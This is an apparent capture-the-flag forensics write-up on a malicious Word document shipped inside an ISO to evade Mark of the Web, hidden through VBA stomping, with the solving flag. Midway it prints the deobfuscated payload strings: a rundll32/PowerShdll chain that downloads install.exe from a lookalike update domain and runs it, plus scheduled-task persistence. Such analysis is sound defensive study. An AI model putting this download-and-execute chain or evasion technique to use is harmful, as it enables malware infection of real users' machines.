New Era

Now that Microsoft will disable Macros coming from the web, APT groups look for alternative ways to bypass MOTW. Thus, our SOC team analyses daily, dozens of different container-based malicious document in different file formats. Make sure you analyse this document properly although it seems to be safe.

Category: Forensics

Solver: 3mb0, mp455

Flag: HTB{sch3dul1ng_t4sks_1s_c00l_but_p0w3rsh3ll_w1th0ut_p0w3rsh3ll_1s_c00l3r}

Writeup

Summary: Decompile and deobfuscate the VBA p-code.

Microsoft wants to fight the macro malware incident rate by denying all macros from documents that are downloaded from the web and therefore have the “Mark of the Web” (MOTW) [1].
In our case we got office.iso containing office.doc. This way the iso file has the MOTW but when mounting / extracting the iso the doc file has not the MOTW. When we open the document we get the notification about macros. When we try to open the macros source code with the integrated IDE we see an almost blank macro file. That’s weird.
Analysing the document with olevba [2] we get the warning that “VBA Stomping was detected: the VBA source code and P-code are different, this may have been used to hide malicious code”. With this we get to know VBA Stomping [3] and what p-code is [4].
Understanding what p-code is we can dump it out of the document with pcodedmp [4]. As p-code is a hardly readable format we searched for p-code decompiler and found pcode2code [5].
The decompiler produces VBA code, of course obfuscated - but even more shocking, it was also broken code. The VBA code contains some strings that look like base64 and some complicated functions. Decoding the base64 strings results in not readable bytes. Reimplementing the code in python took us too long.
So we took our time to learn more and more about the VBA syntax and was able to fix the syntax errors.
Executing the decoding functions we could transform the non readable base64-looking code into:

\powershdll.dll~
https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll
C:\ProgramData\windows\install.exe~~
C:\Windows\System32\rundll32.exe ~~~
\powershdll.dll,main . { Invoke-WebRequest -useb https://windowsliveupdater.com/install.exe -OutFile ~~~
; echo 'cABhAHIAdAAxACAAPQAgACIASABUAEIAewBzAGMAaAAzAGQAdQBsADEAbgBnAF8AdAA0AHMAawBzAF8AMQBzAF8AYwAwADAAbABfACIA' } ^| iex;~
Schedule.Service
Microsoft Corporation~~~
cGFydDIgPSAiYnV0X3AwdzNyc2gzbGxfdzF0aDB1dF9wMHczcnNoM2xsXzFzX2MwMGwzcn0i
2022-02-22T22:22:22~
tigger.ID~~~
C:\ProgramData\windows\install.exe~~

Line 6 and 9 contain base64 text that could be decoded to:

part1 = "HTB{sch3dul1ng_t4sks_1s_c00l_"
part2 = "but_p0w3rsh3ll_w1th0ut_p0w3rsh3ll_1s_c00l3r}"

We found the Flag 🥳

Other resources

[1] https://heimdalsecurity.com/blog/microsoft-autorun-motw-macro-malware/
[2] https://github.com/decalage2/oletools
[3] https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
[4] https://github.com/bontchev/pcodedmp
[5] https://github.com/Big5-sec/pcode2code